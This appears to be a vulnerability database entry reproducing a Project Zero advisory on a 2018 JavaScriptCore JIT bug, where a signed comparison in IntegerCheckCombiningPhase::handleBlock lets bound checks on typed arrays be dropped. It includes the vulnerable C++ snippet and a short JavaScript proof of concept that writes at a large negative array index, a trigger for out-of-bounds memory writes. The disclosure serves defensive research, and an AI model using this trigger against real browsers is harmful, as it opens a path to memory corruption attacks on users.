IntegerCheckCombiningPhase::handleBlock Signed Comparison Vulnerability

vendor:

N/A

by:

Project Zero

7,5

CVSS

HIGH

Integer Overflow

190

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2018

IntegerCheckCombiningPhase::handleBlock Signed Comparison Vulnerability

When compiling Javascript code into machine code, bound checks for all accesses to a typed array are also inserted. These bound checks are re-optimized and the unnecessary checks are removed, which is performed by IntegerCheckCombiningPhase::handleBlock. The problem is that the check |data.m_addend > range.m_maxBound| is a signed comparison. This vulnerability can be exploited by setting a negative index to the typed array, which will bypass the signed comparison check and allow the attacker to write to arbitrary memory locations.

Mitigation:

Ensure that all typed array accesses are properly validated and that the signed comparison check is not bypassed.

Source

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1220

When compiling Javascript code into machine code, bound checks for all accesses to a typed array are also inserted. These bound checks are re-optimized and the unnecessary checks are removed, which is performed by IntegerCheckCombiningPhase::handleBlock.
For example, when the following JavaScript code is compiled, there are all bound checks for 8, 5, 2, but after the optimization, the checks for 5 and 2 are removed, and the only check for 8 will remain.

function f() {
    let arr = new Uint32Array(10);
    for (let i = 0; i < 0x100000; i++) {
        parseInt();
    }
    arr[8] = 1;
    arr[5] = 2;
    arr[2] = 3;
}

f();

Note: parseInt is for forcing to start the JIT optimization.

Here's a snippet IntegerCheckCombiningPhase::handleBlock.

void handleBlock(BlockIndex blockIndex)
{
    ...
        if (range.m_count) {
            if (data.m_addend > range.m_maxBound) {
                range.m_maxBound = data.m_addend;
                range.m_maxOrigin = node->origin.semantic;
            } else if (data.m_addend < range.m_minBound) {
                range.m_minBound = data.m_addend;
                range.m_minOrigin = node->origin.semantic;
            }
    ...
}

The problem is that the check |data.m_addend > range.m_maxBound| is a signed comparison.

PoC:
-->

function f() {
    let arr = new Uint32Array(10);
    for (let i = 0; i < 0x100000; i++) {
        parseInt();
    }
    arr[8] = 1;
    arr[-0x12345678] = 2;
}

f();